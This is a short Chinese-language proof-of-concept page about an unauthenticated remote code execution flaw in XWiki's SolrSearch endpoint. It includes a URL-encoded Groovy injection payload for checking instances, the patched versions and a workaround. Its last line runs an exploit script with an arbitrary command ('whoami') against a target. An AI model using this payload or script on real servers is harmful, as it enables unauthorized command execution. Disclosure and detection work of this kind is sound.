XWiki 未授权远程代码执行 POC
XWiki Platform 是一个通用型 wiki 平台,为构建在其之上的应用程序提供运行时服务。任何访客都可以通过向 SolrSearch 发送请求来执行任意远程代码。这会影响整个 XWiki 安装的机密性、完整性和可用性。要在未登录的情况下在实例上复现,请访问 <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20。如果有输出,并且 RSS 源的标题包含 Hello from search text:42,则该实例存在漏洞。此漏洞已在 XWiki 15.10.11、16.4.1 和 16.5.0RC1 中修复。建议用户升级。无法升级的用户可以编辑 SolrSearchMacros.xml 中第 955 行的 Main.SolrSearchMacros,使其与 macros.vm#L2824 中的 rawResponse 宏保持一致,使用 application/xml 内容类型,而不是直接输出源的内容。
python3 .\CVE-2025-24893.py -u http://vulnerable-endpoint.tld -c "whoami"